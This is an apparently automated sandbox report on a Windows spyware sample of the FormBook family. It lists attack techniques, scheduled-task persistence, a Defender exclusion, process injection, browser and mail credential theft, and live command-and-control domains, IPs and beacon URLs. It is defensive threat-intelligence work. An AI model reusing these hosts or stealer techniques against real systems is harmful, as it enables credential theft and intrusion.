                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                DLL Side-Loading                		1
                Scheduled Task/Job                		11
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Abuse Elevation Control Mechanism                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                DLL Side-Loading                		412
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Timestomp                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                DLL Side-Loading                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588774 Sample: C6Abn5cBei.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 59 www.cg19g5.pro 2->59 61 hm35s.top 2->61 63 3 other IPs or domains 2->63 75 Suricata IDS alerts for network traffic 2->75 77 Antivirus / Scanner detection for submitted sample 2->77 79 Sigma detected: Scheduled temp file as task from temp location 2->79 81 6 other signatures 2->81 10 C6Abn5cBei.exe 7 2->10         started        14 zdDlscHlw.exe 5 2->14         started        signatures3 process4 file5 51 C:\Users\user\AppData\Roaming\zdDlscHlw.exe, PE32 10->51 dropped 53 C:\Users\...\zdDlscHlw.exe:Zone.Identifier, ASCII 10->53 dropped 55 C:\Users\user\AppData\Local\...\tmpE61C.tmp, XML 10->55 dropped 57 C:\Users\user\AppData\...\C6Abn5cBei.exe.log, ASCII 10->57 dropped 91 Uses schtasks.exe or at.exe to add and modify task schedules 10->91 93 Adds a directory exclusion to Windows Defender 10->93 95 Injects a PE file into a foreign processes 10->95 16 C6Abn5cBei.exe 10->16         started        19 powershell.exe 23 10->19         started        21 powershell.exe 23 10->21         started        23 schtasks.exe 1 10->23         started        97 Antivirus detection for dropped file 14->97 99 Multi AV Scanner detection for dropped file 14->99 101 Machine Learning detection for dropped file 14->101 25 schtasks.exe 1 14->25         started        27 zdDlscHlw.exe 14->27         started        signatures6 process7 signatures8 71 Maps a DLL or memory area into another process 16->71 29 mDeEygzSIDmBTP.exe 16->29 injected 73 Loading BitLocker PowerShell Module 19->73 32 conhost.exe 19->32         started        34 WmiPrvSE.exe 19->34         started        36 conhost.exe 21->36         started        38 conhost.exe 23->38         started        40 conhost.exe 25->40         started        process9 signatures10 103 Found direct / indirect Syscall (likely to bypass EDR) 29->103 42 regini.exe 13 29->42         started        process11 signatures12 83 Tries to steal Mail credentials (via file / registry access) 42->83 85 Tries to harvest and steal browser information (history, passwords, etc) 42->85 87 Modifies the context of a thread in another process (thread injection) 42->87 89 3 other signatures 42->89 45 mDeEygzSIDmBTP.exe 42->45 injected 49 firefox.exe 42->49         started        process13 dnsIp14 65 hm35s.top 154.23.184.95, 49988, 49989, 49990 COGENT-174US United States 45->65 67 www.cg19g5.pro 154.88.22.107, 49906, 49924, 49937 CNSERVERSUS Seychelles 45->67 69 2 other IPs or domains 45->69 105 Found direct / indirect Syscall (likely to bypass EDR) 45->105 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                C6Abn5cBei.exe63%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
                C6Abn5cBei.exe65%VirustotalBrowse
                C6Abn5cBei.exe100%AviraHEUR/AGEN.1309499
                C6Abn5cBei.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\zdDlscHlw.exe100%AviraHEUR/AGEN.1309499
                C:\Users\user\AppData\Roaming\zdDlscHlw.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\zdDlscHlw.exe63%ReversingLabsByteCode-MSIL.Trojan.Jalapeno

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.hm35s.top/ebw6/?avRhn=g7KNPNtXo04gJA8a0AickIpMAuCVSKId0JNEKh4/LAY7mt0u3u5aX//D26eCeQ1UgdXt5Q7OBZBmmBkcIEzHCZ/YcP8NJRKC5us+1o1KLAKIeLhdJLJPk6Ry+qmxzeVySw==&fjo=vjgP0XDx0%Avira URL Cloudsafe
                http://www.vayui.top/7nvw/?avRhn=bbdDITTjVn5ZxI6GN1reGwP2o2vtBS0PP+WRiGeKfyb/2X6tLhCWc3R74LhPSoYzFVfNV33VjCQJaZkJOo229iZLjgC+IdiuBJhC/u8wioHnAK20zfUoQLw8DCuNy8wJow==&fjo=vjgP0XDx0%Avira URL Cloudsafe
                http://www.cg19g5.pro/63n1/0%Avira URL Cloudsafe
                http://www.hm35s.top/ebw6/0%Avira URL Cloudsafe
                http://www.327531.buzz/iodk/?avRhn=dmGO6CepyY0nvsEd+06VKI64gib0AW2YSER1oXhei8AaXzs2ne8+dyZVwWklDlgafwdROfr4xQPj+g6hlFS8zXJSWm+a/FKDEmKpBMgLDWMch8H+yCAXb5nRSFJrzKqcGg==&fjo=vjgP0XDx0%Avira URL Cloudsafe
                http://www.cg19g5.pro/63n1/?fjo=vjgP0XDx&avRhn=wxKP0Ki1Kkw6YH7/nhrbl3WDemgIBFZSdqxOdzuCPyveB98x1djFf0ZtvUhWTFSc0EIYzppqTCA/sqplXndAstOOZytUbFrdg7631H3C/N1OxVxb3rHD3zi4wEM6AspOKA==0%Avira URL Cloudsafe
                http://www.hm35s.top0%Avira URL Cloudsafe
                http://www.327531.buzz/iodk/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.vayui.top
                		172.67.145.234
                		truefalse
                  		high
                  hm35s.top
                  		154.23.184.95
                  		truetrue
                    		unknown
                    www.327531.buzz
                    		43.199.54.158
                    		truefalse
                      		high
                      www.cg19g5.pro
                      		154.88.22.107
                      		truetrue
                        		unknown
                        www.hm35s.top
                        		unknown
                        		unknownfalse
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://www.cg19g5.pro/63n1/true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.vayui.top/7nvw/?avRhn=bbdDITTjVn5ZxI6GN1reGwP2o2vtBS0PP+WRiGeKfyb/2X6tLhCWc3R74LhPSoYzFVfNV33VjCQJaZkJOo229iZLjgC+IdiuBJhC/u8wioHnAK20zfUoQLw8DCuNy8wJow==&fjo=vjgP0XDxtrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.hm35s.top/ebw6/true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.327531.buzz/iodk/true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.cg19g5.pro/63n1/?fjo=vjgP0XDx&avRhn=wxKP0Ki1Kkw6YH7/nhrbl3WDemgIBFZSdqxOdzuCPyveB98x1djFf0ZtvUhWTFSc0EIYzppqTCA/sqplXndAstOOZytUbFrdg7631H3C/N1OxVxb3rHD3zi4wEM6AspOKA==true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.hm35s.top/ebw6/?avRhn=g7KNPNtXo04gJA8a0AickIpMAuCVSKId0JNEKh4/LAY7mt0u3u5aX//D26eCeQ1UgdXt5Q7OBZBmmBkcIEzHCZ/YcP8NJRKC5us+1o1KLAKIeLhdJLJPk6Ry+qmxzeVySw==&fjo=vjgP0XDxtrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.327531.buzz/iodk/?avRhn=dmGO6CepyY0nvsEd+06VKI64gib0AW2YSER1oXhei8AaXzs2ne8+dyZVwWklDlgafwdROfr4xQPj+g6hlFS8zXJSWm+a/FKDEmKpBMgLDWMch8H+yCAXb5nRSFJrzKqcGg==&fjo=vjgP0XDxtrue
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://ac.ecosia.org/autocomplete?q=regini.exe, 00000011.00000003.2076366512.00000000083A8000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://duckduckgo.com/chrome_newtabregini.exe, 00000011.00000003.2076366512.00000000083A8000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://duckduckgo.com/ac/?q=regini.exe, 00000011.00000003.2076366512.00000000083A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoregini.exe, 00000011.00000003.2076366512.00000000083A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchregini.exe, 00000011.00000003.2076366512.00000000083A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=regini.exe, 00000011.00000003.2076366512.00000000083A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=regini.exe, 00000011.00000003.2076366512.00000000083A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.ecosia.org/newtab/regini.exe, 00000011.00000003.2076366512.00000000083A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameC6Abn5cBei.exe, 00000000.00000002.1504108330.0000000002621000.00000004.00000800.00020000.00000000.sdmp, zdDlscHlw.exe, 0000000A.00000002.1800123427.00000000031E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.hm35s.topmDeEygzSIDmBTP.exe, 00000014.00000002.2690431464.0000000004B64000.00000040.80000000.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=regini.exe, 00000011.00000003.2076366512.00000000083A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              172.67.145.234
                                              		www.vayui.topUnited States
                                              		13335CLOUDFLARENETUSfalse
                                              43.199.54.158
                                              		www.327531.buzzJapan4249LILLY-ASUSfalse
                                              154.88.22.107
                                              		www.cg19g5.proSeychelles
                                              		40065CNSERVERSUStrue
                                              154.23.184.95
                                              		hm35s.topUnited States
                                              		174COGENT-174UStrue

                                              General Information

                                              Joe Sandbox version:42.0.0 Malachite
                                              Analysis ID:1588774
                                              Start date and time:2025-01-11 05:19:55 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 8m 41s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:22
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:2
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:C6Abn5cBei.exe
                                              renamed because original name is a hash value
                                              Original Sample Name:65990a23e7f833be5f9a90b3a50dc246ec89ffdb4bcc1895c5fe4917438483ce.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@23/16@4/4
                                              EGA Information:
                                              • Successful, ratio: 80%
                                              HCA Information:
                                              • Successful, ratio: 96%
                                              • Number of executed functions: 153
                                              • Number of non-executed functions: 309
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe

                                              Warnings

                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 2.23.242.162, 172.202.163.200, 13.107.246.45
                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target mDeEygzSIDmBTP.exe, PID 6856 because it is empty
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtCreateKey calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              05:21:02Task SchedulerRun new task: zdDlscHlw path: C:\Users\user\AppData\Roaming\zdDlscHlw.exe
                                              23:20:58API Interceptor1x Sleep call for process: C6Abn5cBei.exe modified
                                              23:20:59API Interceptor52x Sleep call for process: powershell.exe modified
                                              23:21:10API Interceptor1x Sleep call for process: zdDlscHlw.exe modified
                                              23:22:13API Interceptor894706x Sleep call for process: regini.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              172.67.145.234RFQ_P.O.1212024.scrGet hashmaliciousFormBookBrowse
                                              • www.vayui.top/ge5i/
                                              NEW.RFQ00876.pdf.exeGet hashmaliciousFormBookBrowse
                                              • www.vayui.top/ge5i/
                                              ek8LkB2Cgo.exeGet hashmaliciousFormBookBrowse
                                              • www.vayui.top/t4v0/
                                              Latest advice payment.exeGet hashmaliciousFormBookBrowse
                                              • www.vayui.top/vg0z/
                                              ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • www.vayui.top/4twy/
                                              OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                              • www.vayui.top/vg0z/
                                              ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • www.vayui.top/4twy/
                                              purchase Order.exeGet hashmaliciousFormBookBrowse
                                              • www.vayui.top/vg0z/
                                              RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                              • www.vayui.top/vg0z/
                                              43.199.54.158RFQ3978 39793980.pdf.exeGet hashmaliciousFormBookBrowse
                                              • www.327531.buzz/iodk/
                                              ek8LkB2Cgo.exeGet hashmaliciousFormBookBrowse
                                              • www.327531.buzz/iyce/
                                              Order MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                                              • www.327531.buzz/zoqm/
                                              IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                              • www.327531.buzz/zoqm/

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              www.327531.buzzRFQ3978 39793980.pdf.exeGet hashmaliciousFormBookBrowse
                                              • 43.199.54.158
                                              ek8LkB2Cgo.exeGet hashmaliciousFormBookBrowse
                                              • 43.199.54.158
                                              Order MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                                              • 43.199.54.158
                                              IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                              • 43.199.54.158
                                              www.cg19g5.proRFQ3978 39793980.pdf.exeGet hashmaliciousFormBookBrowse
                                              • 154.88.22.105
                                              SRT68.exeGet hashmaliciousFormBookBrowse
                                              • 154.88.22.105
                                              ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 154.88.22.105
                                              www.vayui.top1SxKeB4u0c.exeGet hashmaliciousFormBookBrowse
                                              • 104.21.95.160
                                              RFQ3978 39793980.pdf.exeGet hashmaliciousFormBookBrowse
                                              • 104.21.95.160
                                              RFQ_P.O.1212024.scrGet hashmaliciousFormBookBrowse
                                              • 172.67.145.234
                                              NEW.RFQ00876.pdf.exeGet hashmaliciousFormBookBrowse
                                              • 172.67.145.234
                                              ek8LkB2Cgo.exeGet hashmaliciousFormBookBrowse
                                              • 172.67.145.234
                                              PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                              • 104.21.95.160
                                              Latest advice payment.exeGet hashmaliciousFormBookBrowse
                                              • 172.67.145.234
                                              ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 172.67.145.234
                                              OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                              • 104.21.95.160
                                              OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                              • 172.67.145.234

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              LILLY-ASUS02Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 43.205.198.29
                                              suBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                              • 43.205.198.29
                                              3.elfGet hashmaliciousUnknownBrowse
                                              • 40.189.252.194
                                              wWXR5js3k2.exeGet hashmaliciousFormBookBrowse
                                              • 43.205.198.29
                                              frosty.arm.elfGet hashmaliciousMiraiBrowse
                                              • 43.62.215.242
                                              frosty.spc.elfGet hashmaliciousMiraiBrowse
                                              • 40.222.102.237
                                              frosty.x86.elfGet hashmaliciousMiraiBrowse
                                              • 42.64.174.137
                                              frosty.sh4.elfGet hashmaliciousMiraiBrowse
                                              • 40.58.230.116
                                              secured File__esperion.com.htmlGet hashmaliciousPhisherBrowse
                                              • 43.153.232.152
                                              secured File__esperion.com.htmlGet hashmaliciousPhisherBrowse
                                              • 43.152.64.207
                                              CNSERVERSUS1SxKeB4u0c.exeGet hashmaliciousFormBookBrowse
                                              • 23.225.160.132
                                              suBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                              • 23.225.159.42
                                              uG3I84bQEr.exeGet hashmaliciousFormBookBrowse
                                              • 23.225.159.42
                                              aBEh0fsi2c.exeGet hashmaliciousFormBookBrowse
                                              • 154.90.58.209
                                              QmBbqpEHu0.exeGet hashmaliciousFormBookBrowse
                                              • 172.247.112.164
                                              arm.elfGet hashmaliciousMiraiBrowse
                                              • 23.225.101.86
                                              spc.elfGet hashmaliciousMiraiBrowse
                                              • 23.225.150.24
                                              sh4.elfGet hashmaliciousMiraiBrowse
                                              • 23.225.149.53
                                              6.elfGet hashmaliciousUnknownBrowse
                                              • 41.216.185.130
                                              3.elfGet hashmaliciousUnknownBrowse
                                              • 41.216.185.178
                                              CLOUDFLARENETUSwZ6VEnOkie.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 104.21.80.1
                                              prlsqnzspl.exeGet hashmaliciousMassLogger RATBrowse
                                              • 104.21.48.1
                                              ZcshRk2lgh.exeGet hashmaliciousFormBookBrowse
                                              • 104.21.15.100
                                              ydJaT4b5N8.exeGet hashmaliciousFormBookBrowse
                                              • 104.21.48.1
                                              leUmNO9XPu.exeGet hashmaliciousHawkEye, MailPassViewBrowse
                                              • 104.19.223.79
                                              dZMT94YYwO.exeGet hashmaliciousMassLogger RATBrowse
                                              • 104.21.16.1
                                              ZeAX5i7cGB.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 104.26.13.205
                                              jKqPSehspS.exeGet hashmaliciousAgentTeslaBrowse
                                              • 104.26.12.205
                                              BalphRTkPS.exeGet hashmaliciousFormBookBrowse
                                              • 104.21.32.1
                                              A6AHI7Uk18.exeGet hashmaliciousAgentTeslaBrowse
                                              • 172.67.74.152
                                              COGENT-174USZcshRk2lgh.exeGet hashmaliciousFormBookBrowse
                                              • 154.23.184.95
                                              2976587-987347589.07.exeGet hashmaliciousNitol, XmrigBrowse
                                              • 38.45.124.13
                                              BalphRTkPS.exeGet hashmaliciousFormBookBrowse
                                              • 154.12.28.184
                                              02Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 154.23.178.231
                                              SpCuEoekPa.exeGet hashmaliciousFormBookBrowse
                                              • 206.238.89.119
                                              suBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                              • 154.23.178.231
                                              e47m9W6JGQ.exeGet hashmaliciousFormBookBrowse
                                              • 154.23.178.231
                                              BcF3o0Egke.exeGet hashmaliciousFormBookBrowse
                                              • 154.23.184.95
                                              5CTbduoXq4.exeGet hashmaliciousFormBookBrowse
                                              • 38.46.13.54
                                              gKvjKMCUfq.exeGet hashmaliciousFormBookBrowse
                                              • 38.181.21.178

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\C6Abn5cBei.exe.log

                                              Download File
                                              Process:C:\Users\user\Desktop\C6Abn5cBei.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1216
                                              Entropy (8bit):5.34331486778365
                                              Encrypted:false
                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                              Malicious:true
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\zdDlscHlw.exe.log

                                              Download File
                                              Process:C:\Users\user\AppData\Roaming\zdDlscHlw.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1216
                                              Entropy (8bit):5.34331486778365
                                              Encrypted:false
                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                              Malicious:false
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:modified
                                              Size (bytes):2232
                                              Entropy (8bit):5.380192968514367
                                              Encrypted:false
                                              SSDEEP:48:+WSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:+LHyIFKL3IZ2KRH9Oug8s
                                              MD5:E3EC01FAB7E327602A9550342FA73464
                                              SHA1:7F06C78BA2496A8DDB3DDCD63BAF741CB8C84886
                                              SHA-256:4ECCD285FCD821659092ADB47638B559656F97512183BA76AEE2760D531273C5
                                              SHA-512:B66B707510DE1B0AA29F65F1C99BDEEBDC4D34EC3D9950B62E17058D2E5B1599C85A09EC056F1C4BCE019213485F1E3D7E9D68651890A853819F98DBF2492407
                                              Malicious:false
                                              Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                              C:\Users\user\AppData\Local\Temp\7-6E2al6

                                              Download File
                                              Process:C:\Windows\SysWOW64\regini.exe
                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                              Category:dropped
                                              Size (bytes):196608
                                              Entropy (8bit):1.1209886597424439
                                              Encrypted:false
                                              SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                              MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                              SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                              SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                              SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                              Malicious:false
